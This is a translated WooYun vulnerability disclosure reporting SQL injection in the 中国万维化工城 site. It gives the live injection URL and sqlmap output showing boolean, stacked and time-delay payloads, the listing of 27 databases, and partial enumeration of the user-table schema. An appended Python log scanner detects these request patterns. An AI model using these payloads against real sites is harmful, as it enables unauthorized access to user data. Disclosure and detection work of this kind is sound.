
Vulnerability summary

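Bug ID: wooyun-2014-083541

Title: 中国万维化工城 SQL injection vulnerability (involves 27 databases and a large number of user accounts)

Vendor: 中国万维化工城

Author: 天地不仁 以万物为刍狗

Submitted: 2014-11-17 12:25

Fix time: 2015-01-01 12:26

Public disclosure: 2015-01-01 12:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]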



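Vulnerability details

Disclosure status:

2014-11-17: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-01-01: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

中国万维化工城 SQL injection (involves 27 databases and a large number of user accounts)

Detailed description:

Injection point: http://www.chem.com.cn/BuyUser_show.aspx?id=848991


Because there are too many databases, and I also don't know how to tune my machine's configuration, enumerating the tables is too slow, so I only captured part of it in screenshots and did not go any deeper.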

[Screenshots: 00.PNG, 0.PNG, 1.PNG]


Proof of vulnerability:

sqlmap identified the following injection points with a total of 558 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=848991 AND 3274=3274
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=848991; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=848991 WAITFOR DELAY '0:0:5'--
---
[22:22:41] [INFO] testing Microsoft SQL Server
[22:22:42] [INFO] confirming Microsoft SQL Server
[22:22:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


available databases [27]:
[*] bizdb
[*] blob
[*] chat
[*] chemdoc_bak
[*] coating
[*] eep
[*] eepcn
[*] engqsjk
[*] gqsjk
[*] gqsjkweb
[*] LumigentDemoDB
[*] master
[*] model
[*] msdb
[*] oversea
[*] Questionnaire
[*] sdk
[*] selphelp
[*] shiyan
[*] tempdb
[*] test
[*] user_news
[*] WEBSITE
[*] wwbbs
[*] wwBuySelldb
[*] wwuserdb
[*] xxwdb


[23:00:34] [INFO] fetching tables for database: wwuserdb
[23:00:34] [INFO] fetching number of tables for database 'wwuserdb'
[23:00:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:00:34] [INFO] retrieved:
[23:00:36] [WARNING] reflective value(s) found and filtering out
53
[23:00:50] [INFO] retrieved: dbo.aspnet_Applications
[23:04:55] [INFO] retrieved: dbo.aspnet_Membership
[23:07:06] [INFO] retrieved: dbo.aspnet_Paths
[23:08:30] [INFO] retrieved: dbo.aspnet_PersonalizationAllUsers
[23:13:19] [INFO] retrieved: dbo.aspnet_PersonalizationPerUser
[23:15:48] [INFO] retrieved: dbo.aspnet_Profile
[23:17:23] [INFO] retrieved: dbo.aspnet_Roles
[23:18:40] [INFO] retrieved: dbo.aspnet_Sc
......................
......................

Suggested fix:

You know better than I do.
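
Added example, not part of the original report: a log check a defender could run for the request shapes shown in the sqlmap output above, flagging any `id` value sent to BuyUser_show.aspx that is not a plain integer. The log lines, field layout, client IPs and the 5000 ms threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log sample (not from the report); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status time-taken
2014-11-16 22:20:01 198.51.100.7 GET /BuyUser_show.aspx id=848991 200 120
2014-11-16 22:20:05 203.0.113.9 GET /BuyUser_show.aspx id=848991+AND+3274=3274 200 131
2014-11-16 22:20:09 203.0.113.9 GET /BuyUser_show.aspx id=848991;+WAITFOR+DELAY+'0:0:5'-- 200 5140
2014-11-16 22:20:15 203.0.113.9 GET /BuyUser_show.aspx id=848991%20WAITFOR%20DELAY%20'0:0:5'-- 200 5122
2014-11-16 22:21:00 198.51.100.7 GET /news.aspx page=2 200 88
"""

# One rule per technique named in the sqlmap output above.
RULES = [
    ("time-delay", re.compile(r"WAITFOR\s+DELAY", re.I)),
    ("stacked-query", re.compile(r";")),
    ("boolean-tautology", re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
]

def query_param(query, name):
    """Return the URL-decoded value of `name` from a raw cs-uri-query, or None."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key.lower() == name.lower():
            return unquote_plus(value)
    return None

def scan(log_text, stem="/BuyUser_show.aspx", param="id", slow_ms=5000):
    """Return a finding for every request to `stem` whose `param` is not a plain integer."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if row.get("cs-uri-stem", "").lower() != stem.lower():
            continue
        value = query_param(row.get("cs-uri-query", ""), param)
        if value is None or re.fullmatch(r"[0-9]+", value):
            continue                       # absent or well-formed numeric id
        labels = [name for name, rx in RULES if rx.search(value)] or ["non-integer"]
        ms = row.get("time-taken", "")     # a response near the injected delay is a strong signal
        findings.append({"ip": row.get("c-ip"), "value": value, "labels": labels,
                         "slow": ms.isdigit() and int(ms) >= slow_ms})
    return findings
```

The same integer-only test, applied in the page handler before the value reaches a parameterized query, rejects all three request shapes.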

Copyright notice: when reposting, please credit the source: 天地不仁 以万物为刍狗@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused